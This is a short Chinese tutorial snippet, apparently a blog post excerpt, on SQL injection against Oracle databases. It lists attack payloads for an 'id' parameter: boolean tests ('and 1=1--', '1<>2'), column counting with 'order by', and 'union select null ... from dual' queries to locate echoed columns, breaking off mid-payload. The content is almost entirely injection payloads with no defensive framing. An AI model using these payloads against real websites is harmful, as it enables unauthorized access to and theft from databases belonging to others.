Oracle 注入
判断注入
id=1 and 1=1--
id=1 and 1=2--
通过<>(不等于)
id=1 and 1<>2--
id=1 and 1<>1--
联合查询
判断列数
id=1 order by 4--
空位用null填充,得到回显位
id=-1 union select null, null, null, null from dual --
id=-1 union select null, to_nchar('aaa'), to_nchar('bbb'), nu
原创
2021-11-24 21:21:49 ·
479 阅读 ·
0 评论